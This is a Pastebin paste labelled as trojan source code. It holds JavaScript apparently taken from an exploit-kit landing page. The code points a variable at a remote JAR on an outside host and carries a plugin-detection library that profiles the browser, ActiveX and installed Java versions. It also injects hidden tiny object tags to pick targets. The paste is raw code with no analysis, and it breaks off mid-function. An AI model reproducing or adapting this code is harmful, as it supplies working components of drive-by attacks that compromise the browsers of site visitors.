Advertisement
Guest User

Source code from a trojan horse

a guest
Mar 14th, 2012
657
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. var javafile = 'http://accent6.in//images/getJavaInfo.jar';
  2. var jver = [0, 0, 0, 0],
  3.     pdfver = [0, 0, 0, 0];
  4. try {
  5.     var PluginDetect = {
  6.         handler: function (c, b, a) {
  7.             return function () {
  8.                 c(b, a)
  9.             }
  10.         },
  11.         isDefined: function (b) {
  12.             return typeof b != "undefined"
  13.         },
  14.         isArray: function (b) {
  15.             return (/array/i).test(Object.prototype.toString.call(b))
  16.         },
  17.         isFunc: function (b) {
  18.             return typeof b == "function"
  19.         },
  20.         isString: function (b) {
  21.             return typeof b == "string"
  22.         },
  23.         isNum: function (b) {
  24.             return typeof b == "number"
  25.         },
  26.         isStrNum: function (b) {
  27.             return (typeof b == "string" && (/\d/).test(b))
  28.         },
  29.         getNumRegx: / [ \ d][ \ d \ . \ _ ,- ] */,
  30.         splitNumRegx: / [ \ . \ _ ,- ]/g,
  31.         getNum: function (b, c) {
  32.             var d = this,
  33.                 a = d.isStrNum(b) ? (d.isDefined(c) ? new RegExp(c) : d.getNumRegx).exec(b) : null;
  34.             return a ? a[0] : null
  35.         },
  36.         compareNums: function (h, f, d) {
  37.             var e = this,
  38.                 c, b, a, g = parseInt;
  39.             if (e.isStrNum(h) && e.isStrNum(f)) {
  40.                 if (e.isDefined(d) && d.compareNums) {
  41.                     return d.compareNums(h, f)
  42.                 }
  43.                 c = h.split(e.splitNumRegx);
  44.                 b = f.split(e.splitNumRegx);
  45.                 for (a = 0; a < Math.min(c.length, b.length); a++) {
  46.                     if (g(c[a], 10) > g(b[a], 10)) {
  47.                         return 1
  48.                     }
  49.                     if (g(c[a], 10) < g(b[a], 10)) {
  50.                         return -1
  51.                     }
  52.                 }
  53.             }
  54.             return 0
  55.         },
  56.         formatNum: function (b, c) {
  57.             var d = this,
  58.                 a, e;
  59.             if (!d.isStrNum(b)) {
  60.                 return null
  61.             }
  62.             if (!d.isNum(c)) {
  63.                 c = 4
  64.             }
  65.             c--;
  66.             e = b.replace(/\s/g, "").split(d.splitNumRegx).concat(["0", "0", "0", "0"]);
  67.             for (a = 0; a < 4; a++) {
  68.                 if (/^(0 +)(.+)$/.test(e[a])) {
  69.                     e[a] = RegExp.$2
  70.                 }
  71.                 if (a > c || !(/\d/).test(e[a])) {
  72.                     e[a] = "0"
  73.                 }
  74.             }
  75.             return e.slice(0, 4).join(",")
  76.         },
  77.         $$hasMimeType: function (a) {
  78.             return function (d) {
  79.                 if (!a.isIE && d) {
  80.                     var c, b, e, f = a.isString(d) ? [d] : d;
  81.                     if (!f || !f.length) {
  82.                         return null
  83.                     }
  84.                     for (e = 0; e < f.length; e++) {
  85.                         if (/[ ^\ s]/.test(f[e]) && (c = navigator.mimeTypes[f[e]]) && (b = c.enabledPlugin) && (b.name || b.description)) {
  86.                             return c
  87.                         }
  88.                     }
  89.                 }
  90.                 return null
  91.             }
  92.         },
  93.         findNavPlugin: function (l, e, c) {
  94.             var j = this,
  95.                 h = new RegExp(l, "i"),
  96.                 d = (!j.isDefined(e) || e) ? / \ d/ : 0,
  97.                 k = c ? new RegExp(c, "i") : 0,
  98.                 a = navigator.plugins,
  99.                 g = "",
  100.                 f, b, m;
  101.             for (f = 0; f < a.length; f++) {
  102.                 m = a[f].description || g;
  103.                 b = a[f].name || g;
  104.                 if ((h.test(m) && (!d || d.test(RegExp.leftContext + RegExp.rightContext))) || (h.test(b) && (!d || d.test(RegExp.leftContext + RegExp.rightContext)))) {
  105.                     if (!k || !(k.test(m) || k.test(b))) {
  106.                         return a[f]
  107.                     }
  108.                 }
  109.             }
  110.             return null
  111.         },
  112.         getMimeEnabledPlugin: function (a, f) {
  113.             var e = this,
  114.                 b, c = new RegExp(f, "i"),
  115.                 d = "";
  116.             if ((b = e.hasMimeType(a)) && (b = b.enabledPlugin) && (c.test(b.description || d) || c.test(b.name || d))) {
  117.                 return b
  118.             }
  119.             return 0
  120.         },
  121.         getPluginFileVersion: function (f, b) {
  122.             var h = this,
  123.                 e, d, g, a, c = -1;
  124.             if (h.OS > 2 || !f || !f.version || !(e = h.getNum(f.version))) {
  125.                 return b
  126.             }
  127.             if (!b) {
  128.                 return e
  129.             }
  130.             e = h.formatNum(e);
  131.             b = h.formatNum(b);
  132.             d = b.split(h.splitNumRegx);
  133.             g = e.split(h.splitNumRegx);
  134.             for (a = 0; a < d.length; a++) {
  135.                 if (c > -1 && a > c && d[a] != "0") {
  136.                     return b
  137.                 }
  138.                 if (g[a] != d[a]) {
  139.                     if (c == -1) {
  140.                         c = a
  141.                     }
  142.                     if (d[a] != "0") {
  143.                         return b
  144.                     }
  145.                 }
  146.             }
  147.             return e
  148.         },
  149.         AXO: window.ActiveXObject,
  150.         getAXO: function (b) {
  151.             var f = null,
  152.                 d, c = this,
  153.                 a;
  154.             try {
  155.                 f = new c.AXO(b)
  156.             } catch (d) {}
  157.             return f
  158.         },
  159.         convertFuncs: function (g) {
  160.             var a, h, f, b = / ^[ \ $][ \ $]/,
  161.                 d = {},
  162.                 c = this;
  163.             for (a in g) {
  164.                 if (b.test(a)) {
  165.                     d[a] = 1
  166.                 }
  167.             }
  168.             for (a in d) {
  169.                 try {
  170.                     h = a.slice(2);
  171.                     if (h.length > 0 && !g[h]) {
  172.                         g[h] = g[a](g);
  173.                         delete g[a]
  174.                     }
  175.                 } catch (f) {}
  176.             }
  177.         },
  178.         initScript: function () {
  179.             var c = this,
  180.                 a = navigator,
  181.                 e = "/",
  182.                 i = a.userAgent || "",
  183.                 g = a.vendor || "",
  184.                 b = a.platform || "",
  185.                 h = a.product || "";
  186.             c.OS = 100;
  187.             if (b) {
  188.                 var f, d = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, "iPod", 21.2, "iPad", 21.3, "Win. * CE", 22.1, "Win. * Mobile", 22.2, "Pocket \ s * PC", 22.3, "", 100];
  189.                 for (f = d.length - 2; f >= 0; f = f - 2) {
  190.                     if (d[f] && new RegExp(d[f], "i").test(b)) {
  191.                         c.OS = d[f + 1];
  192.                         break
  193.                     }
  194.                 }
  195.             }
  196.             c.convertFuncs(c);
  197.             c.isIE = new Function("return " + e + " * @cc_on!@ * " + e + "false")();
  198.             c.verIE = c.isIE && (/MSIE\s*(\d+\.?\d*)/i).test(i) ? parseFloat(RegExp.$1, 10) : null;
  199.             c.ActiveXEnabled = false;
  200.             if (c.isIE) {
  201.                 var f, j = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM", "ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper", "Scripting.Dictionary", "wmplayer.ocx"];
  202.                 for (f = 0; f < j.length; f++) {
  203.                     if (c.getAXO(j[f])) {
  204.                         c.ActiveXEnabled = true;
  205.                         break
  206.                     }
  207.                 }
  208.                 c.head = c.isDefined(document.getElementsByTagName) ? document.getElementsByTagName("head")[0] : null
  209.             }
  210.             c.isGecko = (/Gecko/i).test(h) && (/Gecko\s*\/\s*\d/i).test(i);
  211.             c.verGecko = c.isGecko ? c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(i) ? RegExp.$1 : "0.9") : null;
  212.             c.isSafari = (/Safari\s*\/\s*\d/i).test(i) && (/Apple/i).test(g);
  213.             c.isChrome = (/Chrome\s*\/\s*(\d[\d\.]*)/i).test(i);
  214.             c.verChrome = c.isChrome ? c.formatNum(RegExp.$1) : null;
  215.             c.isOpera = (/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(i);
  216.             c.verOpera = c.isOpera && ((/Version\s*\/\s*(\d+\.?\d*)/i).test(i) || 1) ? parseFloat(RegExp.$1, 10) : null;
  217.             c.addWinEvent("load", c.handler(c.runWLfuncs, c))
  218.         },
  219.         init: function (c) {
  220.             var b = this,
  221.                 a, c;
  222.             if (!b.isString(c)) {
  223.                 return -3
  224.             }
  225.             if (c.length == 1) {
  226.                 b.getVersionDelimiter = c;
  227.                 return -3
  228.             }
  229.             c = c.toLowerCase().replace(/\s/g, "");
  230.             a = b[c];
  231.             if (!a || !a.getVersion) {
  232.                 return -3
  233.             }
  234.             b.plugin = a;
  235.             if (!b.isDefined(a.installed)) {
  236.                 a.installed = a.version = a.version0 = a.getVersionDone = null;
  237.                 a.$ = b;
  238.                 a.pluginName = c
  239.             }
  240.             b.garbage = false;
  241.             if (b.isIE && !b.ActiveXEnabled) {
  242.                 if (a !== b.java) {
  243.                     return -2
  244.                 }
  245.             }
  246.             return 1
  247.         },
  248.         fPush: function (b, a) {
  249.             var c = this;
  250.             if (c.isArray(a) && (c.isFunc(b) || (c.isArray(b) && b.length > 0 && c.isFunc(b[0])))) {
  251.                 a.push(b)
  252.             }
  253.         },
  254.         callArray: function (b) {
  255.             var c = this,
  256.                 a;
  257.             if (c.isArray(b)) {
  258.                 for (a = 0; a < b.length; a++) {
  259.                     if (b[a] === null) {
  260.                         return
  261.                     }
  262.                     c.call(b[a]);
  263.                     b[a] = null
  264.                 }
  265.             }
  266.         },
  267.         call: function (c) {
  268.             var b = this,
  269.                 a = b.isArray(c) ? c.length : -1;
  270.             if (a > 0 && b.isFunc(c[0])) {
  271.                 c[0](b, a > 1 ? c[1] : 0, a > 2 ? c[2] : 0, a > 3 ? c[3] : 0)
  272.             } else {
  273.                 if (b.isFunc(c)) {
  274.                     c(b)
  275.                 }
  276.             }
  277.         },
  278.         getVersionDelimiter: ", ",
  279.         $$getVersion: function (a) {
  280.             return function (g, d, c) {
  281.                 var e = a.init(g),
  282.                     f, b, h;
  283.                 if (e < 0) {
  284.                     return null
  285.                 };
  286.                 f = a.plugin;
  287.                 if (f.getVersionDone != 1) {
  288.                     f.getVersion(null, d, c);
  289.                     if (f.getVersionDone === null) {
  290.                         f.getVersionDone = 1
  291.                     }
  292.                 }
  293.                 a.cleanup();
  294.                 b = (f.version || f.version0);
  295.                 b = b ? b.replace(a.splitNumRegx, a.getVersionDelimiter) : b;
  296.                 return b
  297.             }
  298.         },
  299.         cleanup: function () {
  300.             var a = this;
  301.             if (a.garbage && a.isDefined(window.CollectGarbage)) {
  302.                 window.CollectGarbage()
  303.             }
  304.         },
  305.         addWinEvent: function (d, c) {
  306.             var e = this,
  307.                 a = window,
  308.                 b;
  309.             if (e.isFunc(c)) {
  310.                 if (a.addEventListener) {
  311.                     a.addEventListener(d, c, false)
  312.                 } else {
  313.                     if (a.attachEvent) {
  314.                         a.attachEvent("on" + d, c)
  315.                     } else {
  316.                         b = a["on" + d];
  317.                         a["on" + d] = e.winHandler(c, b)
  318.                     }
  319.                 }
  320.             }
  321.         },
  322.         winHandler: function (d, c) {
  323.             return function () {
  324.                 d();
  325.                 if (typeof c == "function ") {
  326.                     c()
  327.                 }
  328.             }
  329.         },
  330.         WLfuncs0: [],
  331.         WLfuncs: [],
  332.         runWLfuncs: function (a) {
  333.             a.winLoaded = true;
  334.             a.callArray(a.WLfuncs0);
  335.             a.callArray(a.WLfuncs);
  336.             if (a.onDoneEmptyDiv) {
  337.                 a.onDoneEmptyDiv()
  338.             }
  339.         },
  340.         winLoaded: false,
  341.         $$onWindowLoaded: function (a) {
  342.             return function (b) {
  343.                 if (a.winLoaded) {
  344.                     a.call(b)
  345.                 } else {
  346.                     a.fPush(b, a.WLfuncs)
  347.                 }
  348.             }
  349.         },
  350.         div: null,
  351.         divWidth: 50,
  352.         pluginSize: 1,
  353.         emptyDiv: function () {
  354.             var c = this,
  355.                 a, e, b, d = 0;
  356.             if (c.div && c.div.childNodes) {
  357.                 for (a = c.div.childNodes.length - 1; a >= 0; a--) {
  358.                     b = c.div.childNodes[a];
  359.                     if (b && b.childNodes) {
  360.                         if (d == 0) {
  361.                             for (e = b.childNodes.length - 1; e >= 0; e--) {
  362.                                 b.removeChild(b.childNodes[e])
  363.                             }
  364.                             c.div.removeChild(b)
  365.                         } else {}
  366.                     }
  367.                 }
  368.             }
  369.         },
  370.         DONEfuncs: [],
  371.         onDoneEmptyDiv: function () {
  372.             var c = this,
  373.                 a, b;
  374.             if (!c.winLoaded) {
  375.                 return
  376.             }
  377.             if (c.WLfuncs && c.WLfuncs.length && c.WLfuncs[c.WLfuncs.length - 1] !== null) {
  378.                 return
  379.             }
  380.             for (a in c) {
  381.                 b = c[a];
  382.                 if (b && b.funcs) {
  383.                     if (b.OTF == 3) {
  384.                         return
  385.                     }
  386.                     if (b.funcs.length && b.funcs[b.funcs.length - 1] !== null) {
  387.                         return
  388.                     }
  389.                 }
  390.             }
  391.             for (a = 0; a < c.DONEfuncs.length; a++) {
  392.                 c.callArray(c.DONEfuncs)
  393.             }
  394.             c.emptyDiv()
  395.         },
  396.         getWidth: function (c) {
  397.             if (c) {
  398.                 var a = c.scrollWidth || c.offsetWidth,
  399.                     b = this;
  400.                 if (b.isNum(a)) {
  401.                     return a
  402.                 }
  403.             }
  404.             return -1
  405.         },
  406.         getTagStatus: function (m, g, a, b) {
  407.             var c = this,
  408.                 f, k = m.span,
  409.                 l = c.getWidth(k),
  410.                 h = a.span,
  411.                 j = c.getWidth(h),
  412.                 d = g.span,
  413.                 i = c.getWidth(d);
  414.             if (!k || !h || !d || !c.getDOMobj(m)) {
  415.                 return -2
  416.             }
  417.             if (j < i || l < 0 || j < 0 || i < 0 || i <= c.pluginSize || c.pluginSize < 1) {
  418.                 return 0
  419.             }
  420.             if (l >= i) {
  421.                 return -1
  422.             }
  423.             try {
  424.                 if (l == c.pluginSize && (!c.isIE || c.getDOMobj(m).readyState == 4)) {
  425.                     if (!m.winLoaded && c.winLoaded) {
  426.                         return 1
  427.                     }
  428.                     if (m.winLoaded && c.isNum(b)) {
  429.                         if (!c.isNum(m.count)) {
  430.                             m.count = b
  431.                         }
  432.                         if (b - m.count >= 10) {
  433.                             return 1
  434.                         }
  435.                     }
  436.                 }
  437.             } catch (f) {}
  438.             return 0
  439.         },
  440.         getDOMobj: function (g, a) {
  441.             var f, d = this,
  442.                 c = g ? g.span : 0,
  443.                 b = c && c.firstChild ? 1 : 0;
  444.             try {
  445.                 if (b && a) {
  446.                     c.firstChild.focus()
  447.                 }
  448.             } catch (f) {}
  449.             return b ? c.firstChild : null
  450.         },
  451.         setStyle: function (b, g) {
  452.             var f = b.style,
  453.                 a, d, c = this;
  454.             if (f && g) {
  455.                 for (a = 0; a < g.length; a = a + 2) {
  456.                     try {
  457.                         f[g[a]] = g[a + 1]
  458.                     } catch (d) {}
  459.                 }
  460.             }
  461.         },
  462.         insertDivInBody: function (i) {
  463.             var g, d = this,
  464.                 h = "pd33993399",
  465.                 c = null,
  466.                 f = document,
  467.                 b = " < ",
  468.                 a = (f.getElementsByTagName("body")[0] || f.body);
  469.             if (!a) {
  470.                 try {
  471.                     f.write(b + 'div id="' + h + '">o' + b + "/div>");
  472.                     c = f.getElementById(h)
  473.                 } catch (g) {}
  474.             }
  475.             a = (f.getElementsByTagName("body")[0] || f.body);
  476.             if (a) {
  477.                 if (a.firstChild && d.isDefined(a.insertBefore)) {
  478.                     a.insertBefore(i, a.firstChild)
  479.                 } else {
  480.                     a.appendChild(i)
  481.                 }
  482.                 if (c) {
  483.                     a.removeChild(c)
  484.                 }
  485.             } else {}
  486.         },
  487.         insertHTML: function (g, b, h, a, k) {
  488.             var l, m = document,
  489.                 j = this,
  490.                 q, o = m.createElement("span"),
  491.                 n, i, f = "<";
  492.             var c = ["outlineStyle", "none", "borderStyle", "none", "padding", "0px", "margin", "0px", "visibility", "visible"];
  493.             if (!j.isDefined(a)) {
  494.                 a = ""
  495.             }
  496.             if (j.isString(g) && (/[ ^\ s]/).test(g)) {
  497.                 q = f + g + ' width="' + j.pluginSize + '" height="' + j.pluginSize + '" ';
  498.                 for (n = 0; n < b.length; n = n + 2) {
  499.                     if (/[ ^\ s]/.test(b[n + 1])) {
  500.                         q += b[n] + '="' + b[n + 1] + '" '
  501.                     }
  502.                 }
  503.                 q += ">";
  504.                 for (n = 0; n < h.length; n = n + 2) {
  505.                     if (/[ ^\ s]    /.test(h[n + 1])) {
  506.                         q += f + 'param name="' + h[n] + '" value="' + h[n + 1] + '" / > '
  507.                     }
  508.                 }
  509.                 q += a + f + "/" + g + ">"
  510.             } else {
  511.                 q = a
  512.             }
  513.             if (!j.div) {
  514.                 j.div = m.createElement("div");
  515.                 i = m.getElementById("plugindetect");
  516.                 if (i) {
  517.                     j.div = i
  518.                 } else {
  519.                     j.div.id = "plugindetect";
  520.                     j.insertDivInBody(j.div)
  521.                 }
  522.                 j.setStyle(j.div, c.concat(["width", j.divWidth + "px", "height", (j.pluginSize + 3) + "px", "fontSize", (j.pluginSize + 3) + "px", "lineHeight", (j.pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "block"]));
  523.                 if (!i) {
  524.                     j.setStyle(j.div, ["position", "absolute", "right", "0px", "top", "0px"])
  525.                 }
  526.             }
  527.             if (j.div && j.div.parentNode) {
  528.                 j.div.appendChild(o);
  529.                 j.setStyle(o, c.concat(["fontSize", (j.pluginSize + 3) + "px", "lineHeight", (j.pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "inline"]));
  530.                 try {
  531.                     if (o && o.parentNode) {
  532.                         o.focus()
  533.                     }
  534.                 } catch (l) {}
  535.                 try {
  536.                     o.innerHTML = q
  537.                 } catch (l) {}
  538.                 if (o.childNodes.length == 1 && !(j.isGecko && j.compareNums(j.verGecko, "1,5,0,0") < 0)) {
  539.                     j.setStyle(o.firstChild, c.concat(["display", "inline"]))
  540.                 }
  541.                 return {
  542.                     span: o,
  543.                     winLoaded: j.winLoaded,
  544.                     tagName: (j.isString(g) ? g : "")
  545.                 }
  546.             }
  547.             return {
  548.                 span: null,
  549.                 winLoaded: j.winLoaded,
  550.                 tagName: ""
  551.             }
  552.         },
  553.         java: {
  554.             mimeType: ["application/x-java-applet", "application/x-java-vm", "application/x-java-bean"],
  555.             mimeTypeJPI: "application/x-java-applet;jpi-version=",
  556.             classID: "clsid:8AD9C840-044E-11D1-B3E9-00805F499D93",
  557.             DTKclassID: "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA",
  558.             DTKmimeType: ["application/java-deployment-toolkit", "application/npruntime-scriptable-plugin;DeploymentToolkit"],
  559.             forceVerifyTag: [],
  560.             jar: [],
  561.             Enabled: navigator.javaEnabled(),
  562.             VENDORS: ["Sun Microsystems Inc.", "Apple Computer, Inc."],
  563.             OTF: null,
  564.             All_versions: [],
  565.             mimeTypeJPIresult: "",
  566.             JavaPlugin_versions: [],
  567.             JavaVersions: [
  568.                 [1, 9, 2, 30],
  569.                 [1, 8, 2, 30],
  570.                 [1, 7, 2, 30],
  571.                 [1, 6, 1, 30],
  572.                 [1, 5, 1, 30],
  573.                 [1, 4, 2, 30],
  574.                 [1, 3, 1, 30]
  575.             ],
  576.             searchJavaPluginAXO: function () {
  577.                 var h = null,
  578.                     a = this,
  579.                     c = a.$,
  580.                     g = [],
  581.                     j = [1, 5, 0, 14],
  582.                     i = [1, 6, 0, 2],
  583.                     f = [1, 3, 1, 0],
  584.                     e = [1, 4, 2, 0],
  585.                     d = [1, 5, 0, 7],
  586.                     b = false;
  587.                 if (!c.ActiveXEnabled) {
  588.                     return null
  589.                 };
  590.                 if (c.verIE >= a.minIEver) {
  591.                     g = a.searchJavaAXO(i, i, b);
  592.                     if (g.length > 0 && b) {
  593.                         g = a.searchJavaAXO(j, j, b)
  594.                     }
  595.                 } else {
  596.                     if (g.length == 0) {
  597.                         g = a.searchJavaAXO(f, e, false)
  598.                     }
  599.                 }
  600.                 if (g.length > 0) {
  601.                     h = g[0]
  602.                 }
  603.                 a.JavaPlugin_versions = [].concat(g);
  604.                 return h
  605.             },
  606.             searchJavaAXO: function (l, i, m) {
  607.                 var n, f, h = this.$,
  608.                     q, k, a, e, g, j, b, r = [];
  609.                 if (h.compareNums(l.join(","), i.join(",")) > 0) {
  610.                     i = l
  611.                 }
  612.                 i = h.formatNum(i.join(","));
  613.                 var o, d = "1,4,2,0",
  614.                     c = "JavaPlugin." + l[0] + "" + l[1] + "" + l[2] + "" + (l[3] > 0 ? ("_" + (l[3] < 10 ? "0" : "") + l[3]) : "");
  615.                 for (n = 0; n < this.JavaVersions.length; n++) {
  616.                     f = this.JavaVersions[n];
  617.                     q = "JavaPlugin." + f[0] + "" + f[1];
  618.                     g = f[0] + "." + f[1] + ".";
  619.                     for (a = f[2]; a >= 0; a--) {
  620.                         b = "JavaWebStart.isInstalled." + g + a + ".0";
  621.                         if (h.compareNums(f[0] + "," + f[1] + "," + a + ",0", i) >= 0 && !h.getAXO(b)) {
  622.                             continue
  623.                         }
  624.                         o = h.compareNums(f[0] + "," + f[1] + "," + a + ",0", d) < 0 ? true : false;
  625.                         for (e = f[3]; e >= 0; e--) {
  626.                             k = a + "_" + (e < 10 ? "0" + e : e);
  627.                             j = q + k;
  628.                             if (h.getAXO(j) && (o || h.getAXO(b))) {
  629.                                 r.push(g + k);
  630.                                 if (!m) {
  631.                                     return r
  632.                                 }
  633.                             }
  634.                             if (j == c) {
  635.                                 return r
  636.                             }
  637.                         }
  638.                         if (h.getAXO(q + a) && (o || h.getAXO(b))) {
  639.                             r.push(g + a);
  640.                             if (!m) {
  641.                                 return r
  642.                             }
  643.                         }
  644.                         if (q + a == c) {
  645.                             return r
  646.                         }
  647.                     }
  648.                 }
  649.                 return r
  650.             },
  651.             minIEver: 7,
  652.             getMimeJPIversion: function () {
  653.                 var h, a = this,
  654.                     d = a.$,
  655.                     c = new RegExp("(" + a.mimeTypeJPI + ")(\d.*)", "i"),
  656.                     k = new RegExp("Java", "i"),
  657.                     e, j, f = "",
  658.                     i = {},
  659.                     g = 0,
  660.                     b;
  661.                 for (h = 0; h < navigator.mimeTypes.length; h++) {
  662.                     j = navigator.mimeTypes[h];
  663.                     if (c.test(j.type) && (e = j.enabledPlugin) && (j = RegExp.$2) && (k.test(e.description || f) || k.test(e.name || f))) {
  664.                         i["a" + d.formatNum(j)] = j
  665.                     }
  666.                 }
  667.                 b = "0,0,0,0";
  668.                 for (h in i) {
  669.                     g++;
  670.                     e = h.slice(1);
  671.                     if (d.compareNums(e, b) > 0) {
  672.                         b = e
  673.                     }
  674.                 }
  675.                 a.mimeTypeJPIresult = g > 0 ? a.mimeTypeJPI + i["a" + b] : "";
  676.                 return g > 0 ? b : null
  677.             },
  678.             getVersion: function (m, d, l) {
  679.                 var f, c = this,
  680.                     e = c.$,
  681.                     h = c.NOTF,
  682.                     b = c.applet,
  683.                     j = c.verify,
  684.                     i = vendor = versionEnabled = null;
  685.                 if (c.getVersionDone === null) {
  686.                     c.OTF = 0;
  687.                     c.mimeObj = e.hasMimeType(c.mimeType);
  688.                     c.deployTK.$ = e;
  689.                     c.deployTK.parentNode = c;
  690.                     b.$ = e;
  691.                     b.parentNode = c;
  692.                     if (h) {
  693.                         h.$ = e;
  694.                         h.parentNode = c
  695.                     }
  696.                     if (j) {
  697.                         j.parentNode = c;
  698.                         j.$ = e;
  699.                         j.init()
  700.                     }
  701.                 }
  702.                 var k;
  703.                 if (e.isArray(l)) {
  704.                     for (k = 0; k < b.allowed.length; k++) {
  705.                         if (e.isNum(l[k])) {
  706.                             b.allowed[k] = l[k]
  707.                         }
  708.                     }
  709.                 }
  710.                 for (k = 0; k < c.forceVerifyTag.length; k++) {
  711.                     b.allowed[k] = c.forceVerifyTag[k]
  712.                 }
  713.                 if (e.isString(d)) {
  714.                     c.jar.push(d)
  715.                 }
  716.                 if (c.getVersionDone == 0) {
  717.                     if (!c.version || b.canTryAny()) {
  718.                         f = b.insertHTMLQueryAll(d);
  719.                         if (f[0]) {
  720.                             c.installed = 1;
  721.                             c.EndGetVersion(f[0], f[1])
  722.                         }
  723.                     }
  724.                     return
  725.                 }
  726.                 var g = c.deployTK.query();
  727.                 if (g.JRE) {
  728.                     i = g.JRE;
  729.                     vendor = c.VENDORS[0]
  730.                 }
  731.                 if (!e.isIE) {
  732.                     var q, n, a, o;
  733.                     o = (c.mimeObj && c.Enabled) ? true : false;
  734.                     if (!i && (f = c.getMimeJPIversion()) !== null) {
  735.                         i = f
  736.                     }
  737.                     if (!i && c.mimeObj) {
  738.                         f = "Java[^\d]*Plug-in";
  739.                         a = e.findNavPlugin(f);
  740.                         if (a) {
  741.                             f = new RegExp(f, "i");
  742.                             q = f.test(a.description || "") ? e.getNum(a.description) : null;
  743.                             n = f.test(a.name || "") ? e.getNum(a.name) : null;
  744.                             if (q && n) {
  745.                                 i = (e.compareNums(e.formatNum(q), e.formatNum(n)) >= 0) ? q : n
  746.                             } else {
  747.                                 i = q || n
  748.                             }
  749.                         }
  750.                     }
  751.                     if (!i && c.mimeObj && e.isSafari && e.OS == 2) {
  752.                         a = e.findNavPlugin("Java.*\d.*Plug-in.*Cocoa", 0);
  753.                         if (a) {
  754.                             q = e.getNum(a.description);
  755.                             if (q) {
  756.                                 i = q
  757.                             }
  758.                         }
  759.                     }
  760.                     if (i) {
  761.                         c.version0 = i;
  762.                         if (c.Enabled) {
  763.                             versionEnabled = i
  764.                         }
  765.                     }
  766.                 } else {
  767.                     if (!i && g.status == 0) {
  768.                         i = c.searchJavaPluginAXO();
  769.                         if (i) {
  770.                             vendor = c.VENDORS[0]
  771.                         }
  772.                     }
  773.                     if (i) {
  774.                         c.version0 = i;
  775.                         if (c.Enabled && e.ActiveXEnabled) {
  776.                             versionEnabled = i
  777.                         }
  778.                     }
  779.                 }
  780.                 if (!versionEnabled || b.canTryAny()) {
  781.                     f = b.insertHTMLQueryAll(d);
  782.                     if (f[0]) {
  783.                         versionEnabled = f[0];
  784.                         vendor = f[1]
  785.                     }
  786.                 }
  787.                 if (!versionEnabled && (f = c.queryWithoutApplets())[0]) {
  788.                     c.version0 = versionEnabled = f[0];
  789.                     vendor = f[1];
  790.                     if (c.installed == -0.5) {
  791.                         c.installed = 0.5
  792.                     }
  793.                 }
  794.                 if (e.isSafari && e.OS == 2) {
  795.                     if (!versionEnabled && o) {
  796.                         if (c.installed === null) {
  797.                             c.installed = 0
  798.                         } else {
  799.                             if (c.installed == -0.5) {
  800.                                 c.installed = 0.5
  801.                             }
  802.                         }
  803.                     }
  804.                 }
  805.                 if (c.jreDisabled()) {
  806.                     versionEnabled = null
  807.                 };
  808.                 if (c.installed === null) {
  809.                     c.installed = versionEnabled ? 1 : (i ? -0.2 : -1)
  810.                 }
  811.                 c.EndGetVersion(versionEnabled, vendor)
  812.             },
  813.             EndGetVersion: function (b, d) {
  814.                 var a = this,
  815.                     c = a.$;
  816.                 if (a.version0) {
  817.                     a.version0 = c.formatNum(c.getNum(a.version0))
  818.                 }
  819.                 if (b) {
  820.                     a.version = c.formatNum(c.getNum(b));
  821.                     a.vendor = (c.isString(d) ? d : "")
  822.                 }
  823.                 if (a.getVersionDone != 1) {
  824.                     a.getVersionDone = 0
  825.                 }
  826.             },
  827.             jreDisabled: function () {
  828.                 var b = this,
  829.                     d = b.$,
  830.                     c = b.deployTK.query().JRE,
  831.                     a;
  832.                 if (c && d.OS == 1) {
  833.                     if ((d.isGecko && d.compareNums(d.verGecko, "1,9,2,0") >= 0 && d.compareNums(c, "1,6,0,12") < 0) || (d.isChrome && d.compareNums(c, "1,6,0,12") < 0)) {
  834.                         return 1
  835.                     }
  836.                 };
  837.                 if (d.isOpera && d.verOpera >= 9 && !b.Enabled && !b.mimeObj && !b.queryWithoutApplets()[0]) {
  838.                     return 1
  839.                 }
  840.                 if ((d.isGecko || d.isChrome) && !b.mimeObj && !b.queryWithoutApplets()[0]) {
  841.                     return 1
  842.                 }
  843.                 return 0
  844.             },
  845.             deployTK: {
  846.                 status: null,
  847.                 JREall: [],
  848.                 JRE: null,
  849.                 HTML: null,
  850.                 query: function () {
  851.                     var f = this,
  852.                         h = f.$,
  853.                         c = f.parentNode,
  854.                         i, a, b, g = len = null;
  855.                     if (f.status !== null) {
  856.                         return f
  857.                     }
  858.                     f.status = 0;
  859.                     if ((h.isGecko && h.compareNums(h.verGecko, h.formatNum("1.6")) <= 0) || h.isSafari || h.isChrome || (h.isIE && !h.ActiveXEnabled)) {
  860.                         return f
  861.                     }
  862.                     if (h.isIE && h.verIE >= 6) {
  863.                         f.HTML = h.insertHTML("object", [], []);
  864.                         g = h.getDOMobj(f.HTML)
  865.                     } else {
  866.                         if (!h.isIE && (b = h.hasMimeType(c.DTKmimeType)) && b.type) {
  867.                             f.HTML = h.insertHTML("object", ["type", b.type], []);
  868.                             g = h.getDOMobj(f.HTML)
  869.                         }
  870.                     }
  871.                     if (g) {
  872.                         if (h.isIE && h.verIE >= 6) {
  873.                             try {
  874.                                 g.classid = c.DTKclassID
  875.                             } catch (i) {}
  876.                         };
  877.                         try {
  878.                             var d = g.jvms;
  879.                             if (d) {
  880.                                 len = d.getLength();
  881.                                 if (h.isNum(len)) {
  882.                                     f.status = len > 0 ? 1 : -1;
  883.                                     for (a = 0; a < len; a++) {
  884.                                         b = h.getNum(d.get(len - 1 - a).version);
  885.                                         if (b) {
  886.                                             f.JREall[a] = b
  887.                                         }
  888.                                     }
  889.                                 }
  890.                             }
  891.                         } catch (i) {}
  892.                     }
  893.                     if (f.JREall.length > 0) {
  894.                         f.JRE = h.formatNum(f.JREall[0])
  895.                     }
  896.                     return f
  897.                 }
  898.             },
  899.             queryWithoutApplets00: function (c, a) {
  900.                 var b = window.java,
  901.                     d;
  902.                 try {
  903.                     if (b && b.lang && b.lang.System) {
  904.                         a.value = [b.lang.System.getProperty("java.version") + " ", b.lang.System.getProperty("java.vendor") + " "]
  905.                     }
  906.                 } catch (d) {}
  907.             },
  908.             queryWithoutApplets: function () {
  909.                 var c = this,
  910.                     f = c.$,
